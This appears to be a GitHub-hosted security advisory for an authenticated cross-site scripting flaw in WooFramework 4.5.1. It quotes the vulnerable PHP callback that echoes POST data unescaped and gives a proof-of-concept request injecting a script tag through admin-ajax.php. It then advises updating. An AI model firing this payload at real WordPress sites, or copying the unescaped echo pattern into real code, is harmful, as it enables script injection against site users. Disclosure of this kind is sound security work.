-
Notifications
You must be signed in to change notification settings - Fork 1
/
Copy pathWooFramework 4.5.1.txt
37 lines (30 loc) · 1.02 KB
/
WooFramework 4.5.1.txt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
------------------------------------------------------------------------------
WooThemes WooFramework 4.5.1 Authenicated Cross Site Scripting (XSS)
------------------------------------------------------------------------------
[-] Vulnerability Description:
https://www.owasp.org/index.php/Cross-site_Scripting_(XSS)
the vulnerability is in function "woo_sbm_callback":
Vuln Code:
function woo_sbm_callback() {
...
$save_type = $_POST['type'];
...
if($save_type == 'woo_sbm_get_links'){
$data = $_POST['data'];
parse_str($data,$data_array);
$type = $data_array['type'];
$slug = $data_array['slug'];
$name = $data_array['name'];
$id = $data_array['id'];
...
...
echo "$type|$name|$slug|$id|$url|$conditional";
}
...
}
add_action( 'wp_ajax_woo_sbm_post_action', 'woo_sbm_callback' );
[-] Proof Of Concept:
URL: http://localhost/x/wordpress/wp-admin/admin-ajax.php?action=woo_sbm_post_action
Post Data: type=woo_sbm_get_links&data=type=<script>alert(1)</script>
[-] Fix / Solution:
Update to latest framework.